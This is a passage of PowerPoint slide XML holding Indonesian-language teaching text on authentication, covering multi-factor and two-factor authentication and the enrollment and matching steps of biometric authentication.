              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>geografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lahir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> PIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>multifaktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (2FA). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> PIN.</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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1481758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Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Biometrik</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Langkah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Modul sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Modul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> template. Template </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>representasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>matematis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian-bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> template. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menantang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberhasilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencocokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesesuaiannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
